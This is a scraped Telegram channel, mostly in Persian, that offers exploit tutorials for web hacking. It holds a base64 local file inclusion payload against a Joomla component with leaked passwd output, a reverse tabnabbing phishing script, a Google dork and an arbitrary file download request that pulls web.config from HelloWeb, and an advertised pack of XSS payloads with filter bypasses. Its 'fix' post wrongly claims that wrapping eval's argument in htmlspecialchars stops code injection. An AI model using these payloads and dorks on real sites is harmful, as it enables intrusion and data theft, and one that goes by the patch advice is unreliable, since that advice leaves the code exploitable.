0Day.Today | Learn Exploit | Zero World | Dark web |
19.2K subscribers
1.23K photos
127 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
🔰#PCI Php Code Injection #Vulnerable

❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.

⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
php injection bug.rar
13.5 MB
🔰#PCI Php Code Injection #Vulnerable

❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.

⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
🔰#PCI Php Code Injection #Vulnerable #Ptchor #Fix

❇️ نحوه ی **Fix** یا **Patch** باگ ❇️
این اسیب پذیری در موقعی رخ میدهد که یک برنامه نویسی از تابع
eval();
در php استفاده کند. مانند نمونه کد زیر :
$myvar = "varname";
$x = $_GET['Amir'];
eval("\$myvar = \$x;");

بازتاب ان در سایت :
[localhost]//index.php?Amir=1
برای اینکه امکان inject کردن کد های php نباشد شما میتوانید
از توابع زیر استفاده کنید :
▪️mysql_real_escape_string()
▪️htmlentities()
▪️htmlspecialchars()
▪️strip_tags()
▪️addslashes()
نحوه ی استفاده از اونا به برنامه نویس بستگی داره که معمولا به صورت :
eval(htmlspecialchars("\$myvar = \$x;"));
میباشد.
باتشکر

⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
👍1
💠🌐🌀
🔰⚜️
💢
#Joomla (Joomla!) #Component #EasyShop (Easy Shop) v 1.2.3 #LFI Local File Inclusion #Vulnerable

آسیب پذیری LFI در کامپوننته Easy Shop جوملا :
#~Exploit Title :
Joomla! Component Easy Shop 1.2.3 - Local File Inclusion

#~Path :
آدرسی باگ :
http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=‍‍‍

#~Exploit :
نحوه ی اکسپلویت :
== > برای اینکه اکسپلویت اجرا بشه باید دستورات رو بصورت کاراکتر های Base64 انکود کنید و به اخر url اضافه کنید
مانند :
‍`/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=`

اگر قسمت انکود شده را دیکود کنیم برابر با عبارت زیر میشود :
../../configuration.php

بخشی از پاسخی که سایت برای ما برمیگردونه :
‍`root:x:0:0:root:/root:/bin/bash`
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

برای اینکه بتوانید دستورات خودتون را انکود کنید بهترین راه استفاده از BurpSuite است.(در تب Decoder )

Software Link

⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
#Wordpress #Plugin #Wisechat <= V 2.6.3 - #Reverse #Tabnabbing - #Vulnerable #Vuln (Vulnerable)


آسیب پذیری - برگه ی معکوس یا صفحه ی دزدی معکوس ( Reverse Tabnabbing ) در پلاگین WiseChat وردپرس :

Exploit Title :
Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing



Exploit :

<html>
<script>
if (window.opener) window.opener.parent.location.replace(' #Pishing Page');
if (window.parent != window) window.parent.location.replace('#Pishing Page');
</script>
Open Redirect TEST
</html>


🔰 Description :
#توضیحات :
وقتی کاربر روی لینک مخرب کلیک میکنید محتویات لینک مخرب در تب جدید اما درخوده URL سایت به ما نمایش داده میشود
برای فهمیدن روی عکس ها کلیک کنید :
1 - Pic_1

2 - Pic_2


Demo WiseChat :
دمو پلاگین

About Reverse Tabnabbing :
اطلاعات بیشتر در مورد آسیب پذیری برگه ی معکوس در پست بعدی.
با تشکر از همراهی شما دوستان...


++ > @LearnExploit <++
#About #Reverse #Tabnabbing #Vulnerable ::

برگه ی معکوس یا صفحه دزدی معکوس ::
Reverse Tabnabbing
نوعی صفحه دزدی است که در فهرست حمله های فیشینگ (Phishing) قرار می گیرد و در آن مهاجم به کمک
window.opener.location.assign()
صفحه ای قانونی و قابل اعتماد ایجاد می کند که در آن محتوی مخرب وجود دارد.

به طور خلاصه، در Reverse Tabnabbing وقتی بر روی یک لینک در صفحه وب کلیک می کنیم تا صفحه ای جدید باز شود و آن صفحه هم باز می شود اما وقتی که به صفحه قبلی باز می گردیم همه چیز به ظاهر عادی است اما در واقع پشت سر ما تغییراتی صورت گرفته و به وضوح می توان تغییر را در آدرس اینترنتی آن صفحه مشاهده کرد. اما بسیاری از کاربران متوجه تغییر در URL نمی شوند.

وقتی که به صفحه اصلی بر می گردیم، امکان دارد از ما خواسته شود که بار دیگر وارد حساب کاربری شویم. مهاجمان در واقع صفحه اصلی را با محتوی مخرب تعویض کرده اند، این تغییرات شامل فاویکون و نوار آدرس سایت می شود اما ما متوجه آن نمی شویم. اطلاعات کاربری مان را وارد کرده و هک می شویم.

🔰 demo Bug :
برای مشاهده ی نحوه ی کار کردن روی لینک کلیک کنید.
با تشکر از همراهی شما.

++ > @LearnExploit <++
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه

با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.

ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir رو‌ندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link

#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )

#Dork : ( Inurl:exec/file/download.asp )

#vulnerable-Code :

filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")

root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)

attachfile = root_path & filepath & "\" & filename

Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open

objStream.Type = 1
objStream.LoadFromFile attachfile

Response.BinaryWrite objStream.Read
Response.Flush

طبق کد های مد نظر! این کد ها دسترسی دانلود فایل رو‌برای ما میده.
پارامتر هایی که اسیب‌پذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile

چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf

در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...

نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک‌ سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
رو‌به اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو‌ با پارامتر متفاوت تست کنید.

#PoC
تست :
این تست روی لوکال هاست صورت گرفته.

GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close

نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#XSS #vulnerable #vulnerabilities #Payloads #Private #Priv8 #Part_1

پیلود های اسیب پذیری XSS

»» (مفدی نگید کار نمیکنه ،این پیلود هارو باید بلد باشید | البته بعضیا اسونه)

»» دانلود در پست بعدی...

#Author : X0P4SH4

IR0Day.Today Bax
@LearnExploit
@Tech_Army
#XSS #vulnerable #vulnerabilities #Payloads #Private #Priv8 #Part_1

پیلود های اسیب پذیری XSS

»» (مفدی نگید کار نمیکنه ،این پیلود هارو باید بلد باشید | البته بعضیا اسونه)

نکته : یادم‌ رفت بگم
دوستان علاوه بر اینکه بخش اعظمی از پیلود ها توشه بایپس های زیادی هم به همراه پیلود
ها ترکیب شده

»» جهت دانلود کلیک‌کنید.

#Author : X0P4SH4

IR0Day.Today Bax
@LearnExploit
@Tech_Army